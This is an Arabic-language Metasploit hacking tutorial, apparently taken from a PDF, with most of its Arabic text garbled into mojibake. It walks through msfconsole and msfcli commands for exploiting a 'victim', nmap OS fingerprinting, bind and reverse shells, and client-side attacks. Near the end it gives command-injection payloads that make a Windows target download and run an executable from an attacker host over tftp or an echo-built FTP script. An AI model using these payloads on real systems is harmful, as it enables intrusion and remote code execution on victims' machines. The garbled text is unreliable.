‫‪msfcli :‬اداٖ ل‪ٔ ِٓ ٗ٠ٛ‬بظ‪ ٗ١‬اٌفىشٖ ‪ٚ‬عش‪٠‬ؼٗ ا‪٠‬نب ‪ ,‬ثؤِىبٔه اعحغالي اٌرغشٖ ثذ‪ ْٚ‬اٌذخ‪ٛ‬ي اٌ‪ٝ‬‬

‫‪msfconsle ,‬اعحغالي اٌرغشٖ ‪٠‬حُ ثغطش ‪ٚ‬اظذ ‪ ,‬ػٍ‪ ٝ‬ظغت اػحمبد‪ ٞ‬االداٖ ٘زٖ‬

‫‪ٚ‬مؼ‪٘ٛ‬ب ٌ‪١‬حُ وحبثٗ اٌغىشثحبت ‪ٚ‬اد‪ٚ‬اات جغحخذَ اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ِرً ‪fasttrack‬‬

‫‪msfgui :‬اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ث‪ٛ‬اشٗ سع‪ٌ ,, ٗ١ِٛ‬ىٓ ال أقط ث‪ٙ‬ب ثحبجب ا‪ٚ‬ال اٌ‪ٛ‬اش‪ ٗٙ‬ثط‪١‬ئٗ‬

‫ذبٔ‪١‬ب اٌ‪ٛ‬اش‪ٙ‬ة اس‪ ٜ‬اْ اٌحؼبًِ ِؼ‪ٙ‬ب فؼت ‪ٚ‬ا‪٠‬نب ًِّ‬

‫‪ٚmsfwe b :‬اش‪ٙ‬ة سع‪ٌ , ٗ١ِٛ‬ىٓ افنً ِٓ عبثمح‪ٙ‬ب ‪ ,‬ال افنً اعحؼّبٌ‪ٙ‬ب الٔ‪ٙ‬ب ثط‪١‬ئٗ ا‪٠‬نب‬

‫ساض اؽشض ‪msfconsole , msfcli‬الْ ثّؼشفح‪ ُٙ‬جؼشف و‪١‬ف‪ ٗ١‬اٌحؼبًِ ِغ االخش‪٠‬بت‪.‬‬

‫‪1- msfconsole‬‬

‫ساض اؽشض اال‪ٚ‬اِش اٌّ‪ّٗٙ‬‬

‫‪1- show‬‬

‫االِش ٘زا ‪٠‬مقذ ثٗ اػشك ع‪ٛ‬اء ‪payload encoder nops exploits auxiliary , options all‬‬

‫ِربي ‪:‬‬
‫‪show exploits‬‬
‫ػشك اٌرغشات‬

‫‪show payloads‬‬
‫ػشك ‪payloads‬‬

‫‪15‬‬
show encoders

encoders ‫ػشك‬

show nops

nops ‫ػشك‬

show auxiliary

auxiliary‫ػشك‬

show options

‫بسات‬١‫ػشك اٌخ‬

2- use

auxiliary ٚ‫ اعحخذَ اٌرغشٖ ا‬ٕٝ‫ثّؼ‬

:‫ِربي‬

use exploit/windows/smb/msdns_zonename

use auxiliary/scanner/smb/version

‫ف اظفع اعُ اٌرغشٖ وبًِ ؟‬١‫حغبئً و‬٠ ‫اٌجؼل‬

‫ِٓ ذُ امغو صس‬ٚuse ex ٗ‫ه وحبث‬١ٍ‫ ػ‬ٌٟ‫عحبز وً ا‬٠ ‫ِب‬


‫ء‬ٟ‫ىًّ وً ؽ‬٠ ‫ساض‬ٚ ‫سد‬ٛ‫ج‬١‫ اٌى‬ٍٝ‫ػ‬Tab

3- info

ٖ‫ِبت اٌرغش‬ٍٛ‫ػشك ِؼ‬

:‫ِربي‬

info exploit/windows/smb/msdns_zonename

ٚ‫ا‬

use exploit/windows/smb/msdns_zonename

16
‫ذُ‬
‫‪info‬‬

‫‪set -4‬‬

‫ثّؼٕ‪ ٝ‬مغ ٌٍّحغ‪١‬ش ل‪ّٗ١‬‬

‫ِربي‬

‫‪set rhost 192.168.1.3‬‬


‫‪set payload windows/shell_bind_tcp‬‬

‫‪connect -5‬‬

‫ِرً اداٖ إٌث وبت‬

‫‪exploit and run -6‬‬

‫‪exploit‬جغحخذَ ٌحؾغ‪ ً١‬اٌرغشات‬

‫‪٠run‬غحخذَ ٌحؾغ‪auxiliary ً١‬‬

‫‪back -7‬‬

‫اٌؼ‪ٛ‬دٖ ٌٍ‪ٛ‬ساء‬

‫ِربي‪:‬‬
‫‪msf exploit(msdns_zonename) > back‬‬
‫> ‪msf‬‬

‫ثم‪ ٗ١‬اال‪ٚ‬اِش ساض جىحؾف‪ٙ‬ب ِغ االعحخذاَ ثؤرْ هللا‬

‫ٔش‪ٚ‬ض ٌطش‪٠‬مٗ اعحخذاَ اٌرغشٖ‬

‫اعحخذاِ‪ٙ‬ب ع‪ِ ًٙ‬ب جحؼذا خّظ ا‪ٚ‬اِش‬

‫اسم الثغره ‪use‬‬

‫‪show option‬‬

‫ليتم عرض المتغيرات‬

‫اسم المتغير ‪set‬‬

‫‪17‬‬
exploit

. ٖ‫بس اٌرغش‬١‫ٓ اخح‬١‫ٗ ظ‬١‫بسات اٌّخف‬١‫ثؼل اٌخ‬

show advanced
show evasion

‫ثؼل اٌّشات‬ٚ, ‫ة الْ ِٓ وً ذغشٖ ٌرغشٖ جخحٍف‬ٍٛ‫ُ اال ارا وٕث فبُ٘ اٌّط‬ٙ‫بساج‬١‫ش خ‬١١‫ِب أقط ثحغ‬

,‫حه‬١‫بص مع‬ٙ‫ ش‬ٍٝ‫بسات هجؼب ٘زا ثٕبء ػ‬١‫ً ثؼل اٌخ‬٠‫اٌرغشٖ ِب جؾحغً اال ثؼذ جؼذ‬

show targets

‫ب‬ٙ١ٍ‫ جؾحغً اٌرغشٖ ػ‬ٟ‫ػشك اال٘ذاف اٌح‬

msfcli ٜ‫ض ٌالداٖ االخش‬ٚ‫ٔش‬

َ‫ٗ االعحخذا‬١‫ف‬١‫ض ٌى‬ٚ‫ٔش‬

‫اظذ‬ٚ ‫ك عطش‬٠‫ػٓ هش‬ٚ ‫ً شذا‬ٙ‫ب ع‬ِٙ‫اعحخذا‬

PHP:‫د‬ٛ‫و‬
Usage: ./msfcli <exploit_****> <option=value> [mode]
====================================================

Mode Description
---- -----------
(H)elp Youre looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module

ٖ‫ِبت اٌرغش‬ٛ‫ٍِؼ‬S =

ٖ‫بسات اٌرغش‬١‫خ‬O =

ٖ‫ً اٌرغش‬١‫جؾغ‬E = ِِ

ٗ‫د اٌخبف‬ٍٛ٠‫ػشك ثب‬P =

ٖ‫ِربي العحغالي ذغش‬

18
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lh
ost=1.1.1.1

ً‫ثذاي ِب ٔىحت داخ‬


msfconsole

set rhost a.b.c.d

set payload windows/****

‫ٔنغ‬
rhost=
payload=

‫ك‬١‫٘زا اٌؾشض وّخحقش ثؤِىبٔه اٌحطج‬

. ‫ُ شذا‬٠‫ك لذ‬١‫ جطج‬ٞ‫أب ػٕذ‬

, ‫ك‬١‫جبثغ اٌحطج‬

http://www.youtube.com/watch?v=vF3ZwD0vssk

19
‫التعامل مع الثغرات‪.‬‬

‫اعحغالي اٌرغشٖ اع‪ِّ ًٙ‬ب جحق‪ٛ‬س ‪.‬‬

‫ثؼذ ِب اخحشٔب اٌرغشٖ ػٓ هش‪٠‬ك االِش ‪use‬‬

‫ثؼذ ِب اخحشٔب اٌرغشٖ ٔىحت ‪show option‬‬

‫ثؼذ ِب ٔظشٔب ٌٍّحغ‪١‬شات‬

‫ساض ٔصذ ‪RHOST‬‬

‫‪ٚ‬جؼٕ‪ ٟ‬دائّب ا‪ ٞ‬ث‪ ٟ‬اٌنع‪ٗ١‬‬

‫ِ‪RPORT‬‬

‫‪ٚ‬جؼٕ‪ ٟ‬دائّب ث‪ٛ‬ست اٌنع‪ , ٗ١‬غبٌجب ِب أقط ثحغ‪١١‬شٖ اال ارا وبٔث اٌرغشٖ جؼًّ ػٍ‪ ٝ‬اورش ِٓ ث‪ٛ‬ست‬

‫ثؼذ٘ب ٔنغ ٌىً اٌّحغ‪١‬شات ل‪. ّٗ١‬‬


‫‪set rhost‬اي بي الضحيه‬

‫‪set rport‬بورت الضحيه‬

‫ثم‪ ٟ‬االْ ٌٕب ‪payload‬‬


‫‪set payload payload’s name‬‬

‫ٔىحت‬

‫‪show options‬‬

‫ظ‪ٙ‬شت ٌٕب خ‪١‬بسات شذ‪٠‬ذٖ ‪ ٟ٘ٚ‬خ‪١‬بسات ‪payload‬‬

‫‪20‬‬
‫‪ٚLHOST‬جؼٕ‪ip ٟ‬اٌّ‪ٙ‬بشُ ‪,‬‬

‫‪ٚLPORT‬جؼٕ‪ ٟ‬ث‪ٛ‬ست اٌّ‪ٙ‬بشُ‬

‫‪set lhost‬اي بي المهاجم‬

‫‪set lport‬بورت المهاجم‬

‫ذُ اخش ؽ‪ٟ‬ء ٔىحت ‪exploit‬‬

‫‪ٔٚ‬ؾغً اٌرغشٖ‬

‫ِب اج‪ٛ‬لغ اْ ف‪ ٟ‬اداٖ اعحغالٌ‪ٙ‬ب اع‪٘ ِٓ ًٙ‬زا ‪ ,‬ظح‪ ٝ‬اٌجب‪٠‬ض‪ ْٚ‬اٌحؼبًِ ِؼٗ افؼت‬

‫‪ٔ1-‬خحبس اٌرغشٖ‬

‫‪use windows/smb/smb‬‬

‫‪ٕٔ2-‬ظش اٌ‪ِ ٝ‬حطٍجبت اٌرغشٖ‬

‫‪show option‬‬

‫‪ٔ3-‬نغ اٌم‪ٌٍّ ُ١‬حغ‪١‬شات‬

‫‪Abc‬‬ ‫‪set‬المتغير‬

‫‪ٔ4-‬خحبس‪payload‬‬
‫‪set payload windows/meterpreter‬‬

‫‪ٔ5-‬نغ اٌّحغ‪١‬شات ٌٍـ‪payload‬‬


‫‪abc‬‬ ‫‪set‬المتغير‬

‫‪21‬‬
ٖ‫ٔغحغً اٌرغش‬6-

exploit

! ‫ٗ ؟‬١‫ٕب اٌرغشٖ ً٘ اخحشلٕب اٌنع‬١ٍ‫اعحغ‬

sessions open ‫ارا لبي ػٕذن‬

, ‫ء‬ٟ‫ ِب ظقً ؽ‬ٟٕ‫ؼ‬٠ , ‫ب‬ٌٙ‫ ارا ِب لب‬, ٗ١‫ػٕذن مع‬

, َٛ‫ص‬ٌٙ‫حه لجً ا‬١‫ افعـ مع‬, ‫ك اٌفعـ‬٠‫ ػٓ هش‬, ‫ب‬ٌٙ‫ب ؽغب‬ٙٔ‫ٔؼشف ا‬ٚ ٖ‫ف ٔغحغً اٌرغش‬١‫ت و‬١‫ه‬

. ٕٗ‫ِبت ػ‬ٍٛ‫ اشّغ ِؼ‬, ‫حه‬١‫لجً جفعـ مع‬ٚ

‫ف‬ٚ‫اْ إٌظبَ ِؼش‬ٚ ‫ض‬ٛ‫ست ِفح‬ٛ‫صُ لجً جحؤوذ ِٓ اْ اٌج‬ٙ‫ال ج‬amap , ٚ‫ا‬nmap nessus ‫ػٕذن‬

smb ِٗ‫ ٌىٓ ارا وبْ خذ‬, ‫لغ‬ٛ‫ه إٌظبَ اٌّح‬١‫ؼط‬٠ٚnmap ‫ك‬٠‫ِّىٓ جخّٓ إٌظبَ ػٓ هش‬

% 111 َ‫ ٘زٖ اٌعبٌٗ ٔمذس ٔؼشف إٌظب‬ٟ‫ فف‬, ٌٗ‫ؽغب‬

:‫ث ِربي‬٠ٍٛ‫حبعج‬١ٌّ‫ك ا‬٠‫ػٓ هش‬


msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
msf auxiliary(version) > run
[*] 192.168.1.2 is running Windows Vista Ultimate Service Pack 1 (********: U
nknown) (****:BANDAR-PC) (domain:WORKGROUP)

msf auxiliary(version) >

ٓ١ِٚ‫اٌذ‬ٚ ُ‫االع‬ٚ َ‫ إٌظب‬ٟٔ‫اػطب‬

nmap‫ض ٌٍـ‬ٚ‫ٔب ٔش‬ٍٛ‫ٌىٓ خ‬

msf auxiliary(version) > nmap -PN 192.168.1.2 -p 445 -O[*] exec: nmap -
PN 192.168.1.2 -p 445 -O

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-15 05:45 EST


Interesting ports on 192.168.1.2:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1D:60:64:06:EC (Asustek Computer)

22
‫‪Warning: OSScan results may be unreliable because we could not find at least‬‬
‫‪1 open and 1 closed port‬‬
‫‪Device type: general purpose‬‬
‫‪Running: Microsoft Windows Vista|2008‬‬
‫‪OS details: Microsoft Windows Vista SP0 or SP1 or Server 2008 SP1‬‬
‫‪Network Distance: 1 hop‬‬

‫‪OS detection performed. Please report any incorrect results at http://nmap.or‬‬


‫‪g/submit/ .‬‬
‫‪Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds‬‬

‫‪,‬‬ ‫اػطبٔ‪ِ ٟ‬رً ِبجؾ‪ٛ‬ف‪ ْٛ‬جخّ‪ٕ١‬بت‬

‫ثؤِىبٔه اعحخذاَ ‪ٌ NSE‬حظ‪ٙ‬ش اٌّؼٍ‪ِٛ‬بت اٌقع‪١‬عٗ ‪ٚ‬ثذ‪ ْٚ‬جخّ‪ٓ١‬‬


‫);‬
‫ػشفٕب و‪١‬ف ٔخحبس اٌرغشٖ ارا وبٔث س‪ّٛ٠‬ت ‪,‬‬

‫ارا وبْ اٌنع‪ِ ٗ١‬ب ػٕذٖ ث‪ٛ‬ست ِفح‪ٛ‬ض ؟ !‬

‫ٔش‪ٚ‬ض ٌحغشات ‪client-side attacks ,‬‬

‫‪ ِٓ80 %‬إٌ‪ٛ‬ػ‪٘ ٗ١‬ز‪ٔ ٞ‬بشعٗ ‪ٚ ,‬ارا سشؼث ٌ‪ٙ‬زٖ اٌرغشات ساض جخحشق ‪ِ ,‬رً جغشات اٌّحقفط‬

‫ه‪١‬ت ٌ‪ِ ٛ‬ب اؽحغٍث ٘زٖ اٌرغشات ‪,,‬‬

‫جؤوذ ِٓ اٌخ‪١‬بسات ِٓ شذ‪٠‬ذ ‪ ,‬جؤوذ أه ‪ٚ‬مؼث شّ‪١‬غ اٌم‪ٌٍّ ُ١‬حغ‪١‬شات‬

‫خبسز اال‪٠‬طبس ‪ :‬ؽغً اداٖ ‪ٌtcpdump‬حؼشف اْ اد‪ٚ‬اجه ؽغبٌٗ ‪ِ ,‬رال ٌ‪ ٛ‬اعحغٍ‪ٕ١‬ب اٌرغشٖ ‪ٚ‬اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ج‪ٛ‬لف فصؤٖ ا‪ ٚ‬فبس‬
‫ا‪ ٞ‬ؽ‪ٟ‬ء ‪ ,‬ساض جى‪ِ ْٛ‬شالت اٌحشاف‪١‬ه ‪ٚ‬جؼشف ‪,‬‬

‫فشاظٗ أب فبست ِؼ‪ِ ٟ‬ؾىٍٗ ِغ ‪nmap‬فعـ ش‪ٙ‬بص ‪ٚ‬اخزت عبػٗ ‪ٚ‬سثغ ‪ٚ‬أب أحظش ‪,‬‬

‫‪nmap‬ج‪ٛ‬لف فصؤٖ ‪ٚ‬أب ِب ادس‪ , ٞ‬اخزت أحظش ذُ ؽغٍث ‪ٚtcpdump‬ػشفث اْ اٌـ ‪nmap‬‬

‫ِح‪ٛ‬لف‪ٌ ,‬زٌه ِٓ االفنً لجً جغ‪ ٞٛ‬ا‪٘ ٞ‬ص‪ َٛ‬ؽغً ‪ٌtcpdump‬حؼشف اْ اد‪ٚ‬اجه ؽغبٌٗ ػٍ‪ ٝ‬اٌ‪ٛ‬شٗ اٌقع‪١‬ط‬

‫اٌّ‪ٔ ُٙ‬ششغ الُ٘ االعجبة ف‪ ٟ‬فؾً اعحغالي اٌرغشات‬

‫‪1-‬اٌنع‪ ٗ١‬ال ‪٠‬غحخذَ اٌجشٔبِس اٌّقبة‬

‫ثؼل اٌّشات ‪٠‬ى‪ ْٛ‬اٌجشٔبِس غ‪١‬ش ِ‪ٛ‬ش‪ٛ‬د ‪٘ٚ‬زٖ ٌ‪١‬غث ثبٌّؾىٍٗ ف‪ٕٙ‬بٌه اٌؼؾشات ِٓ اٌرغشات إٌخحٍفٗ ‪.‬‬

‫‪2-‬اٌصذاس إٌبس‪٠ ٞ‬عصت اٌ‪ٛ‬ف‪ٛ‬ي اٌ‪ ٝ‬اٌج‪ٛ‬ست‬

‫‪23‬‬
‫ثؼل اٌج‪ٛ‬سجبت جى‪ِ ْٛ‬عص‪ٛ‬ثٗ ‪ٚ‬ثؼن‪ٙ‬ب ال ‪ِ ,‬رً جغشات ‪SMB‬جغحخذَ اورش ِٓ ث‪ٛ‬ست‬

‫ٌزٌه ظب‪ٚ‬ي جغ‪١‬ش ث‪ ٓ١‬اٌج‪ٛ‬سجبت ‪.‬‬

‫‪ٕ٘3-‬بٌه ِٓ ‪٠‬ىؾف اٌرغشٖ ‪٠ٚ‬م‪ َٛ‬ثعصج‪ٙ‬ب ِرً ‪IPS‬‬

‫ِٓ اٌقؼت اٌحؼبًِ ِغ ٘زٖ اٌّؾىٍٗ ٌىٓ االفنً ٘‪ ٛ‬اٌحؼبًِ ِغ ‪ evasion‬ف‪ ٟ‬اٌّ‪١‬حبعجٍ‪٠ٛ‬ث‬

‫‪ٚ‬ال أقط اٌّجحذأ اٌحؼبًِ ِؼ‪ٙ‬ب‬

‫‪4-‬اٌنع‪ِّ ٗ١‬ىٓ ‪٠‬ى‪ ْٛ‬لبثً ٌالعحغالي اٌرغشٖ ٌىٓ ٌُ جغحغً‬

‫٘زٖ اٌّؾىٍٗ ٔبدسا ِب جعذخ ‪ ٟ٘ٚ ,‬ػٕذِب جغحغً اٌرغشٖ ‪ِّ ,‬ىٓ ‪٠‬ق‪١‬ش ؽ‪ٟ‬ء غ‪١‬ش ِح‪ٛ‬لغ‬

‫‪ِ ٟ٘ٚ‬رال ‪٠‬ق‪١‬ش ٌٗ ٘بٔك "‪ٕٙ٠‬ك" ا‪ِ ٚ‬رال ‪٠‬ؼ‪١‬ذ اٌحؾغ‪ً١‬‬

‫ِشٖ وٕث اخحجش ذغشٖ شذ‪٠‬ذٖ ػٍ‪ ٝ‬ش‪ٙ‬بص‪, ٞ‬‬

‫ش‪ٙ‬بص‪ِ ٞ‬ب ظذذحٗ ‪٠‬ؼٕ‪ ٟ‬اٌرغشٖ ‪٠‬صت اْ جؾحغً ‪ ,‬اعحغٍ‪١‬ث اٌرغشٖ ‪ٚ ,‬فصؤٖ اٌص‪ٙ‬بص ‪ٚ‬لف ػٓ اٌؼًّ ٌزٌه‬

‫ٌزٌه ِّىٓ ثؼل اٌّشات ج‪ٛ‬اش‪ٙ‬ه ٘زٖ اٌّؾىٍٗ‬

‫‪5-‬اٌص‪ٙ‬بص خٍف ‪nat‬‬

‫٘زا افجط ِؼش‪ٚ‬ف ‪ ,‬شّ‪١‬غ االش‪ٙ‬ضٖ خٍف ٔبت ‪ِ ,‬بف‪ ٗ١‬ا‪ ٞ‬ؽخـ اال ‪٠ٚ‬غحخذَ ِ‪ٛ‬دَ‬

‫ٌزٌه ‪٠‬صت اٌحؤوذ اْ اٌج‪ٛ‬ست ِفح‪ٛ‬ض ‪ٚ‬ا‪٠‬نب جؤوذ اْ جغحخذَ اجقبي ػىغ‪.ٟ‬‬

‫‪24‬‬
‫اداه ‪ Metasploit‬ليست الطريقه الوحيده لالختراق‪.‬‬

‫ف‪٘ ٟ‬زا اٌمغُ عٕحطشق اٌ‪ٝ‬‬


‫‪1-‬ا‪٠‬نبض اْ اٌّ‪١‬حبعجٍ‪٠ٛ‬ث ٌ‪١‬ظ اٌطش‪٠‬مٗ اٌ‪ٛ‬ظ‪١‬ذٖ‬

‫‪2-‬ج‪ٛ‬م‪١‬ط الغٍت اٌرغشات اٌح‪ٔ ٟ‬غحخذِ‪ٙ‬ب‬

‫‪3-‬ؽشض ٌٍرغشات اٌح‪ ٟ‬ال جغحخذَ ‪shellcode‬‬

‫ٔجذأ ‪ٚ‬ػٍ‪ ٝ‬ثشوٗ هللا ‪,,‬‬

‫اغٍت االؽخبؿ ‪٠‬ظٓ اْ وٍّٗ االخحشاق ِشث‪ٛ‬هٗ ثبٌّ‪١‬حبعجٍ‪٠ٛ‬ث ‪٘ٚ‬زا خطؤ !‬

‫اٌّ‪١‬حبعجٍ‪٠ٛ‬ث اداٖ ل‪ٌ ٗ٠ٛ‬ىٓ ٕ٘بٌه ذغشات ٌ‪١‬غث ثبٌّ‪١‬حبعجٍ‪٠ٛ‬ث ‪ٚ‬ثؼل اٌّشات جؼحجش ِٓ ‪0-day‬‬

‫ٌزٌه عؤؽشض ؽشض عش‪٠‬غ ٌٍحؼبًِ ِغ اٌرغشات خبسز ا‪٠‬طبس اٌّ‪١‬حبعجٍ‪٠ٛ‬ث !‬

‫‪1-‬ذغشات خبسز اٌّ‪١‬حبعجٍ‪٠ٛ‬ث‬

‫ٔؤخز ِرال ذغشٖ‬

‫‪http://www.exploit-db.com/exploits/11204‬‬

‫٘زٖ اٌرغشٖ ف‪ ٟ‬ثشٔبِس ‪ٚAOL‬اٌجشٔبِس ِؾ‪ٛٙ‬س‬

‫ػٍ‪ ٝ‬اٌؼّ‪ َٛ‬افحط اٌرغشٖ ‪ ,‬ساض جالظع ‪ActiveX‬ا‪ ٚ‬ظح‪html , ٝ‬ثؼذ اٌّالظظٗ ساض ٔؼشف اْ اٌرغشٖ جغحغً‬

‫ػٓ هش‪٠‬ك اٌّحقفط ‪ ,‬ثّؼٕ‪ ٝ‬ادق اٌنع‪ ٗ١‬ساض ‪٠‬حقفط ٘زٖ اٌقعفٗ ‪ٔٚ‬غحغً ػٓ هش‪٠‬م‪ٙ‬ب‬

‫‪victim ------------------------> attacker‬‬

‫‪victim ----------------------------------> attacker‬‬


‫>‪......................----------------------------------‬‬

‫‪25‬‬
‫ٔالظع اْ ا‪ٚ‬ي اٌغ‪ٕ١‬بس‪, ٛ٠ٚ‬‬

‫‪1-‬اٌنع‪ ٗ١‬اجقً ثبٌّ‪ٙ‬بشُ‬


‫‪2-‬اٌّ‪ٙ‬بشُ اسعً اٌرغشٖ ‪ٚ‬ثٕفظ اٌ‪ٛ‬لث اٌنع‪ ٗ١‬ؽغً اٌرغشٖ‬
‫‪3-‬ظقٍحب ػٍ‪ ٝ‬اجقبي ػىغ‪ٟ‬‬

‫ٔغحٕس اْ ٘زٖ اٌرغشٖ ِٓ ٔ‪ٛ‬ع ‪client-side attack .‬‬

‫ٔز٘ت اٌ‪shellcode , ٝ‬و‪١‬ف‪ ٗ١‬جغ‪١١‬شٖ‬

‫دائّب ثؤعحغالي اٌرغشٖ ‪٠‬ىحت اٌّىحؾف = ‪shellcode‬ا‪ِّ ٚ‬ىٓ ‪٠‬ىحت االعُ غ‪١‬ش ٌىٓ دائّب جىحت ػٍ‪٘ ٝ‬زا اٌؾىً ‪.‬‬

‫ٌىٓ اٌـ ‪ shellcode‬ف‪٘ ٟ‬زٖ اٌرغشٖ و‪١‬ف اوحجٗ ‪ ,‬ؽىٍٗ غش‪٠‬ت ؟ !‬

‫‪shellcode‬ف‪٘ ٟ‬زٖ اٌرغشٖ ِىح‪ٛ‬ة ػٍ‪ ٝ‬اٌصبفبعىشثث ‪ِّٚ‬ىٓ جغحخذَ اداٖ ‪msfpayload .‬‬

‫‪2-‬ج‪ٛ‬م‪١‬ط الغٍت اٌرغشات‬

‫اٌرغشات جٕمغُ اٌ‪ ٝ‬لغّ‪ ٓ١‬اعبع‪ ٓ١١‬غ‪١‬ش االلغبَ ف‪ ٟ‬اٌذسط اٌربٔ‪. ٟ‬‬

‫ج‪ٛ‬م‪١‬ط‪ :‬اٌمغّ‪٘ ٓ١‬زا ػبَ ثّؼٕ‪ِ ٝ‬ربي ِغ فبسق اٌحؾج‪ , ٗ١‬االٔغبْ ‪٠‬ب ِغٍُ ‪٠‬ب وبفش‬

‫ارا وبْ ِغٍُ ‪٠‬ى‪ِ ْٛ‬رال عٕ‪ ٟ‬ا‪ ٚ‬ؽ‪١‬ؼ‪ٚ ٟ‬ارا وبْ وبفش ِّىٓ ‪٠‬ى‪ٛٙ٠ ْٛ‬د‪ٔ ٞ‬قشأ‪. ٟ‬‬

‫اٌّ‪ُٙ‬‬

‫‪A -‬ذغشات جى‪ ْٛ‬جعث ِظٍٗ‪server-side attacks‬‬

‫ِٓ اعّ‪ٙ‬ب‬

‫اٌّ‪ٙ‬بشُ ‪٠‬شعً االعحغالي ِجبؽشٖ ٌٍنع‪ٗ١‬‬

‫‪attacker -----------------------> victim‬‬

‫ذُ ِٓ ثؼذ٘ب ‪٠‬ؾغً اٌؾً و‪ٛ‬د ‪.‬‬

‫‪B -‬ذغشات جى‪ ْٛ‬جعث ِظٍٗ ‪client-side attacks‬‬

‫‪٘ٚ‬زٖ اٌؼىظ الْ اٌنع‪٠ ٗ١‬حقً ثبٌّ‪ٙ‬بشُ ‪ ِٓٚ‬ذُ ‪٠‬حُ االعحغالي‬

‫‪26‬‬
‫‪victim -----------------> attacker‬‬

‫‪ ِٓٚ‬ذُ ‪٠‬حُ جؾغ‪ ً١‬اٌؾً و‪ٛ‬د ‪.‬‬

‫اعحغالي اٌرغشات جى‪ِ ْٛ‬ىح‪ٛ‬ثٗ ثٍغبت ِخحٍفٗ ‪perl ,python ,c , ruby etc‬‬

‫‪ٚ‬غبٌجب وبجت االعحغالي ‪٠‬ىحج‪ٙ‬ب ثبٌجذا‪ٚ .. ٗ٠‬ا‪٠‬نب ثؤِىبٔه ِؼشفح‪ٙ‬ب ثٕفغه ‪.‬‬

‫‪3-‬ذغشات ال جغحخذَ ‪ shellcode‬ا‪ ٚ‬ثؼل اٌّؾبوً اٌح‪ ٟ‬ج‪ٛ‬اشٗ اٌـ ‪shellcode‬‬

‫‪http://www.exploit-db.com/exploits/11151‬‬

‫ٕٔظش اٌ‪٘ ٝ‬زٖ اٌرغشٖ ِرال ‪,‬‬

‫اٌّ‪ ٌٛ ُٙ‬جبثؼٕب اٌرغشٖ ِبٌ‪ٙ‬ب ‪ٔ ً٘shellcode‬ؼحجش اْ اٌرغشٖ غج‪ ٗ١‬او‪١‬ذ ال ‪.‬‬

‫ثؼل اٌرغشات جغحؼًّ ‪ٌshellcode‬ىٓ ظ‪ٔ ٓ١‬غحخذَ ‪bindshell‬ساض ‪٠‬عظشٖ اٌصذاس إٌبس‪ٞ‬‬

‫‪attacker --------------------X| victim‬‬

‫اٌجؼل ‪٠‬م‪ٛ‬ي ٔغحخذَ ‪reverseshell‬ا‪ ٚ‬اجقبي ػىغ‪ٔ , ٟ‬غحخذَ ٌىٓ ثؼل اٌّشات اٌصذاس إٌبس‪٠ ٞ‬عظش االجقبي اٌخبسز ‪.‬‬

‫‪attacker------------> | X <-- victim‬‬

‫ِبف‪ ٗ١‬اال ‪٘ٚfind socket shellcod‬زا ٌٗ ا‪٠‬نب ِؾبوٍٗ اٌخبفٗ‬

‫ثم‪ ٝ‬ػٕذٔب ٔغحخذَ ‪code execution shellcode‬‬

‫اٌرغشٖ اٌٍ‪ ٟ‬ثبٌغبثك جغحؼًّ ‪ٌcode execution‬زٌه ساض ٔغحخذَ ثؼل اال‪ٚ‬اِش اٌٍ‪ ٟ‬جف‪١‬ذٔب ثؤخحشاق‬

‫اٌنع‪. ٗ١‬‬

‫ا‪ٚ‬ال اٌرغشٖ جغحخذَ ٌحؾغ‪ِ ً١‬رال ‪cmd.exe‬ثّؼٕ‪ ٝ‬اخش ثؤِىبٕٔب اٌحعىُ ثبال‪ٚ‬اِش‬

‫‪27‬‬
tftp .‫ك‬٠‫ٍٗ ػٓ هش‬١‫ِٓ ذُ جؾغ‬ٚ ‫ً اٌٍّف‬١ّ‫جع‬1-

tftp ‫ك‬٠‫ٔؾغٍٗ ػٓ هش‬ٚ ‫ٔمذس ٔعًّ ٍِف‬

ُ‫بش‬ٌّٙ‫بص ا‬ٙ‫ ش‬ٍٝ‫ػ‬tftp server ‫نب‬٠‫ا‬ٚ ٗ١‫بص اٌنع‬ٙ‫ ش‬ٍٝ‫ػ‬tftp client ‫د‬ٛ‫ش‬ٚ ٗ‫ِطٍجبج‬

‫ْ ِرال‬ٛ‫ى‬٠ ٌٗ‫اعحؼّب‬

PHP:‫د‬ٛ‫و‬
arg1="c:\WINDOWS\system32\cmd.exe /c tftp -
i attacker_IP GET file.exe && file.exe"

ftp .‫ك‬٠‫ٍٗ ػٓ هش‬١‫ِٓ ذُ جؾغ‬ٚ ‫ً اٌٍّف‬١ّ‫جع‬2-

ftp client ٗ١‫ْ ػٕذ اٌنع‬ٛ‫ى‬٠ ٗ‫ِطٍجبج‬

ftp -s:attacker.txt َ‫مٗ االعحخذا‬٠‫هش‬

‫ِربي‬

arg1="c:\WINDOWS\system32\cmd***** /c echo open ×.×.×.× 21 > silv3r00t.txt && echo


USER silv3r00t >> silv3r00t.txt && echo bin >> silv3r00t.txt && echo GET silv3r00t*****
>> silv3r00t.txt && echo bye >>silv3r00t.txt && ftp:-s silv3r00t.txt && silv3r00t.exe"

echo open ×.×.×.× 21 > silv3r00t.txt

ٟ‫ ث‬ٟ‫ = اف ج‬41 ‫ست‬ٛ‫ اٌج‬ٍٝ‫ ػ‬ٟٔ‫لغ اٌفال‬ٌّٛ‫فحط ا‬٠ ‫اِش‬

echo USER silv3r00t >> silv3r00t.txt

,, ٟ‫ُ ظك ظغبث‬١ٔ ‫صس‬ٛ١ٌ‫ا‬

echo PASS silv3r00t >> silv3r00t.txt

,, ‫ ٌٍعغبة‬ٟ‫سد ظم‬ٛ‫اٌجبع‬

28
echo bin >> silv3r00t.txt

,,ٞ‫ٕش‬٠‫مغ ثب‬ٚ ٍٝ‫هجؼب االْ ػ‬

echo GET silv3r00t.exe >> silv3r00t.txt

